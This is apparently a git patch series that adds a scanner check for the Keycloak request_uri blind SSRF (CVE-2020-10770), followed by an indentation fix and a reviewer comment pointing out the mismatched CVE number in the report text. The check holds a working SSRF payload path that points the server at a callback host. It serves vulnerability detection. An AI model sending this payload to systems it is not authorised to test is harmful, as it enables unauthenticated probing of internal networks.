From e3306de7b91be5836701c01e7b57aea07bea7fab Mon Sep 17 00:00:00 2001
From: MOHAMMAD SAQLAIN <32585833+mrrootsec@users.noreply.github.com>
Date: Wed, 12 Jul 2023 10:28:02 +0530
Subject: [PATCH 1/2] Create CVE-2020-10770 Keycloak request_uri SSRF

CVE-2020-10770 Keycloak request_uri SSRF
---
 .../CVE-2020-10770 Keycloak request_uri SSRF | 30 +++++++++++++++++++
 1 file changed, 30 insertions(+)
 create mode 100644 vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF

diff --git a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
new file mode 100644
index 0000000..7134302
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
@@ -0,0 +1,30 @@
+metadata:
+ language: v1-beta
+ name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
+ description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
+ author: "mrrootsec"
+ tags: "keycloak","cve","ssrf"
+
+run for each:
+potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
+
+given host then
+ send request:
+ method: `GET`
+ path: {potential_path}
+
+if dns interactions then
+ report issue:
+ severity: info
+ confidence: certain
+ detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)"
+ remediation: "Upgrade to the latest version of Keycloak"
+ end if
+
+ if http interactions then
+ report issue:
+ severity: high
+ confidence: certain
+ detail: "Vulnerable to CVE-2021-10774 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)"
+ remediation: "Upgrade to the latest version of Keycloak"
+ end if

From 213c5469e94029cfe89d78212a482f864fc261ae Mon Sep 17 00:00:00 2001
From: MOHAMMAD SAQLAIN <32585833+mrrootsec@users.noreply.github.com>
Date: Thu, 13 Jul 2023 07:53:57 +0530
Subject: [PATCH 2/2] Update CVE-2020-10770 Keycloak request_uri SSRF

Fixed indentation.. Please review it again
---
 .../CVE-2020-10770 Keycloak request_uri SSRF | 22 +++++++++----------
 1 file changed, 11 insertions(+), 11 deletions(-)

diff --git a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
index 7134302..bb446ba 100644
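Review bot: The `detail:` strings in both `report issue` blocks name `CVE-2021-10774`, while the file name, the `name:` field and the commit title all say CVE-2020-10770, so every finding this check raises would carry the wrong identifier; change both lines to `detail: "Vulnerable to CVE-2020-10770 - Keycloak - request_uri Blind Server-Side Request Forgery (SSRF)"`. The follow-up indentation commit leaves these two lines untouched. Separately, the `if dns interactions` branch reports `confidence: certain` on a name lookup alone, even though its `severity: info` already treats that as weaker evidence than the HTTP callback; `confidence: tentative` (or `firm`) would be consistent, since a DNS interaction can originate from a resolver or intermediary without the server having fetched the URL. The `remediation:` text could also cite the fixed version the `name:` field already states, e.g. `remediation: "Upgrade to Keycloak 12.0.1 or later"`.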
--- a/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
+++ b/vulnerabilities-CVEd/CVE-2020-10770 Keycloak request_uri SSRF
@@ -1,19 +1,19 @@
 metadata:
- language: v1-beta
- name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
- description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
- author: "mrrootsec"
- tags: "keycloak","cve","ssrf"
+ language: v1-beta
+ name: "Keycloak before 12.0.1 version - request_uri Blind Server-Side Request Forgery (Unauthenticated)"
+ description: "Keycloak allows an unauthenticated attacker to send arbitrary values in 'request_uri' parameter and interact with internal network resources which is otherwise not accessible externally. An attacker may use this feature to perform Blind SSRF (Server-side request forgery) attacks on the server."
+ author: "mrrootsec"
+ tags: "keycloak", "cve", "ssrf"
 
 run for each:
-potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
+ potential_path = `/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{generate_collaborator_address()}`
 
-given host then
- send request:
- method: `GET`
- path: {potential_path}
+ given host then
+ send request:
+ method: `GET`
+ path: {potential_path}
 
-if dns interactions then
+ if dns interactions then
 report issue:
 severity: info
 confidence: certain